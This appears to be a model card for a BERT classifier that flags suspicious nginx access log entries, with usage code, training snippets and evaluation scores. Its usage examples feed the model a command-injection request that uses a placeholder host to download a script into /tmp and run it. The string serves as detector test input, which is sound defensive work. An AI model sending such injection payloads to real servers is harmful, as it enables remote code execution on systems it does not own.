Log-inspector Open-source Log Detection Model - Free Deployment for Accurate Identification of Suspicious and Safe Logs

Log Inspector

Developed by u-haru

A pre-trained model for nginx access logs that classifies each log entry as suspicious or safe.

Text Classification

Transformers

English

Open Source License: Apache-2.0

#Nginx log analysis #Malicious request detection #BERT pre-training

Downloads 138

Release Time: 12/23/2022

Model Overview

This model is based on the bert-base-cased architecture and is designed to analyze nginx access logs and identify suspicious entries.

Model Features

High accuracy

In the reported 10,000-log evaluation, the model reaches an AUROC of about 0.99998 with 0 false positives and 10 false negatives.

Pre-trained model

Built on the bert-base-cased pre-trained model, so it starts from general-purpose, case-sensitive English language representations.

Easy to use

Can be loaded through either the transformers or the simpletransformers library for quick integration.

Model Capabilities

Log classification

Suspicious log detection

Safe log identification

Use Cases

Cybersecurity

Suspicious log detection

Detects suspicious entries in nginx access logs, such as potential attack attempts.

Evaluation on 10,000 logs reports 9,964 true positives, 26 true negatives, 0 false positives, and 10 false negatives.

🚀 Log Inspector

A pre-trained model for inspecting nginx access logs, based on [bert-base-cased](https://huggingface.co/bert-base-cased).

🚀 Quick Start

This model is designed to inspect nginx access logs. It can classify logs into suspicious and safe categories.

💻 Usage Examples

Basic Usage

The input text must be formatted as follows:
"path: <path>; ref:<referrer>; ua:<user agent>;"
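Access logs are rarely stored in this shape, so some preprocessing is usually needed. The sketch below assumes nginx's default `combined` log format and uses a hypothetical helper, `to_inspector_input`, to build the input string. The regular expression and the helper name are illustrative and are not part of the original project.

```python
import re

# Regex for nginx's default "combined" log format (an assumption about the log source).
COMBINED = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

def to_inspector_input(line: str) -> str:
    """Hypothetical helper: turn one combined-format line into the model's input text."""
    m = COMBINED.match(line)
    if m is None:
        raise ValueError("line does not match the combined log format")
    request = m.group("request")
    # A request normally looks like "<METHOD> <path> <protocol>".
    _method, _, rest = request.partition(" ")
    path, _, _protocol = rest.rpartition(" ")
    if not path:
        # No protocol part (or a malformed request): keep whatever is there.
        path = rest or request
    return f"path: {path}; ref:{m.group('ref')}; ua:{m.group('ua')};"

line = ('203.0.113.7 - - [23/Dec/2022:10:00:00 +0000] '
        '"GET /index.html HTTP/1.1" 200 612 "-" "curl/7.68.0"')
print(to_inspector_input(line))  # path: /index.html; ref:-; ua:curl/7.68.0;
```

Logs written with a custom `log_format` would need a different pattern.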

>>> from transformers import pipeline
>>> inspector = pipeline('text-classification', model="u-haru/log-inspector")
>>> inspector('path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;')
[{'label': 'LABEL_0', 'score': 0.9999788999557495}]

Here, class 0 represents a suspicious log, and class 1 represents a safe log.
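Because the pipeline returns generic names such as `LABEL_0`, it can help to translate them before reporting results. The following is a minimal sketch that assumes the pipeline emits only `LABEL_0` and `LABEL_1`, matching the class mapping described above; `LABEL_NAMES` and `describe` are hypothetical names introduced for illustration.

```python
# Mapping taken from the text: class 0 = suspicious, class 1 = safe.
LABEL_NAMES = {"LABEL_0": "suspicious", "LABEL_1": "safe"}

def describe(prediction: dict) -> dict:
    """Hypothetical helper: attach a readable verdict to one pipeline result."""
    return {
        "verdict": LABEL_NAMES[prediction["label"]],
        "score": prediction["score"],
    }

# Uses the result shown in the basic usage example.
result = describe({"label": "LABEL_0", "score": 0.9999788999557495})
print(result["verdict"])  # suspicious
```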

Advanced Usage

Using simpletransformers

>>> import torch
>>> from simpletransformers.classification import ClassificationModel
>>> use_cuda = True  # set to False to force CPU
>>> param = {}  # simpletransformers model args; an empty dict keeps the defaults
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> predictions, raw_outputs = model.predict(['path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;'])
>>> print(predictions)
[0]

Evaluation and Training

>>> import pandas as pd
>>> import torch
>>> from simpletransformers.classification import ClassificationModel
>>> use_cuda = True  # set to False to force CPU
>>> param = {}  # simpletransformers model args; an empty dict keeps the defaults
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> data = [["Suspicious log",0],["Safe log",1]]
>>> df = pd.DataFrame(data, columns=["text", "labels"])  # column names simpletransformers looks for

>>> model.train_model(df)
>>> result, model_outputs, wrong_predictions = model.eval_model(df)
>>> print(result)
{'mcc': 1.0, 'tp': 1, 'tn': 1, 'fp': 0, 'fn': 0, 'auroc': 1.0, 'auprc': 1.0, 'eval_loss': 1.8238850316265598e-05}

The model was trained with 9500 access logs. Here is the evaluation score:

{'mcc': 0.993114718313972, 'tp': 1639, 'tn': 729, 'fp': 0, 'fn': 7, 'auroc': 0.9994166345815686, 'auprc': 0.9997937194890235, 'eval_loss': 0.020282083051662583}

And the evaluation with 10,000 logs:

{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}
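The `mcc` values above can be reproduced from the reported confusion-matrix counts, which also shows why the second score is lower even though only 10 of 10,000 logs were misclassified. The sketch below applies the standard Matthews correlation coefficient formula; the function name `mcc` is only illustrative.

```python
from math import sqrt

def mcc(tp: int, tn: int, fp: int, fn: int) -> float:
    """Matthews correlation coefficient from confusion-matrix counts."""
    denom = sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
    # By convention the score is 0 when any marginal total is zero.
    return (tp * tn - fp * fn) / denom if denom else 0.0

# Counts copied from the two evaluation results above.
print(round(mcc(tp=1639, tn=729, fp=0, fn=7), 4))   # 0.9931
print(round(mcc(tp=9964, tn=26, fp=0, fn=10), 4))   # 0.8494
```

In the 10,000-log evaluation only 36 logs were predicted as the negative class (26 true negatives plus 10 false negatives), so the 10 errors weigh heavily on MCC even though plain accuracy is 9,990 / 10,000 = 99.9%.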

📚 Documentation

The source code for training is available here: [github.com/u-haru/log-inspector](https://github.com/u-haru/log-inspector)

📄 License

This project is licensed under the Apache 2.0 license.
